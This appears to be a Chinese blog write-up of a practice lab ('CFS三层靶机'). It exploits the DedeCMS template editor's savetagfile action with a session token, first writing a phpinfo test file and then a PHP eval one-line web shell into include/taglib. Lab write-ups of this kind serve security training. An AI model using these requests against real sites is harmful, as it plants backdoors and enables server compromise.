新:CFS三层靶机

08110

http://ip:xx7端口

先登录后台

再访问http://xxxxxxxx:xx7/dede/tpl.php?action=upload

使用插件EditThisCookie2

图片[1]-新:CFS三层靶机-tess-wiki

看一下cookie,这里的cookie就是token

d2b5ca33bd184103

POC1

http://xxxxxxxx:xx7/dede/tpl.php?action=savetagfile&token=2oas45oamvhr57b2pbcl6pkvg0&filename=abc.lib.php&content=<?php phpinfo();?>

d2b5ca33bd184202

成功写入

根据代码可以看到写入到taglib目录,浏览器访问http://xxxxxxxx:xx7/include/taglib/abc.lib.php

d2b5ca33bd184325

http://xxxxxxxx:xx7/dede/tpl.php?action=savetagfile&token=2oas45oamvhr57b2pbcl6pkvg0&filename=aaa.lib.php&content=<?php eval($_POST[“aaa”]);?>

d2b5ca33bd184747

© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
Vlunhub
喜欢就支持一下吧
点赞10 分享
Tess的头像-tess-wiki
HTB靶机:Bastard-tess-wiki
HTB靶机:Bastard
HTB靶机:Bastard
2年前 291
使用Gost搭建一个快速简单的Socks5代理通道-tess-wiki
使用Gost搭建一个快速简单的Socks5代理通道
使用Gost搭建一个快速简单的Socks5代理通道
2年前 236
CISP-PTS-第一天-上午-tess-wiki
CISP-PTS-第一天-上午
CISP-PTS-第一天-上午
2年前 211
kali安装蚁剑AntSword和运行-tess-wiki
kali安装蚁剑AntSword和运行
kali安装蚁剑AntSword和运行
2年前 175
PWN入门-tess-wiki
PWN入门
PWN入门
2年前 153
Python 连接mysql脚本-tess-wiki
Python 连接mysql脚本
Python 连接mysql脚本
1年前 150
相关推荐
评论 抢沙发
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称

请填写用户信息:

  • 昵称(必填)
  • 邮箱(必填)

    暂无评论内容